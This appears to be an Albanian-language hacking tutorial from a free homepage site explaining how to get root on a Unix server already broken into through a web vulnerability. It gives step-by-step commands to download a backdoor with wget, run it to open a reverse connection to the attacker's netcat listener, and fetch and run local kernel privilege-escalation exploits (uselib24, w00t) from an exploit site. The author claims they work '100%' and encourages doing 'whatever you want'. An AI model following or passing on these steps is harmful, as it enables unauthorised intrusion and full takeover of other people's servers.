Image and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPicImage and video hosting by TinyPic< Image and video hosting by TinyPic Image and video hosting by TinyPic
   
  Hacker-DimY.
  Si te HacKoJM RooT
 
 Pik se pari

Cka eshte Root ?

Root thiret tash ne Standart nga krej user me Krejt te Drejtat
Ne Ndonje Sistem Pra Live me then si Pronari i Serverit

Si me e thy ate ku me gjet si me hy

Per ty hy me 1 root legal apo ilegal qe keni hack ju nevoitet PuTTy
mund te beni download Ketu
http://www.chiark.greenend.org.uk/~s.../download.html
http://www.tartarus.org/~simon/putty.../x86/putty.exe


Ku me e gjet 1 server qe ta hackerojm
Pasi qe e keni lexuar mesimin tim tjeter Si me Hack Uebfaqe me File Include
kur te hyni ne Server do tju nevoitet Backdoor per me e hack Rooten ne at
Uebfaqe qe e keni hack

Si ku dhe cka eshte Backdoor ?

backdoor eshte nje dritare e hapur nje lidhje pas me serverin qe mundeni me u kyq
me NETCAT!

Cka eshte Netcat ?

Netcat eshte nje program i vogel qe e leshon ne Pc me e prit 1 Lidhje nga backdoori pra e
Aktivizoni Netcat ne pc e juaj hyni ne webin qe e keni hack wget webi.com/backdoor
pastaj e leshoni " perl backdoor IPeJuaj porti " dhe backdoor scripti provon te lidhet
me Pc e juaj ne at portin qe e keni shenu ne NETCAT me e prit lidhjen Dhe lidheni me
Sistemin qe e keni hack pasi te lidheni

komanden: uname -a " e shikoni versionin e KERNEL te unix sistemit "

Nese eshte 2.4 - 2003 - 2004 - 2005 - perdoreni Exploitin lokal " uselib24 "
Nese eshte 2.3 ose me posht version i vitit 2003 perdoreni explotin lokal " w00t "

Si me i perdor exploitat ?

Exploitat mund ti gjeni Ketu:
http://xpl.by.ru/

per w00t si me e perdor ?
wget 
http://xpl.by.ru/w00t
chmod 777 w00t
./w00t " prisni pak "
dhe shkruani komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.
------------
per uselib24
wget 
http://xpl.by.ru/uselib24
chmod 777 uselib24
./uselib24
Processon....
shkruan komanden: id
nese ju del : id (root)

Suksess e keni hack Rooten dhe mundeni me bo cka te doni.

keshtu edhe exploita tjer mundeni me provu 100% funksionon testuar nga une personalisht
keni edhe exploita tjer aty krad,krad2,krad3 ,ptrace24<< per 2.4 etc.
 
   
 
=> Do you also want a homepage for free? Then click here! <=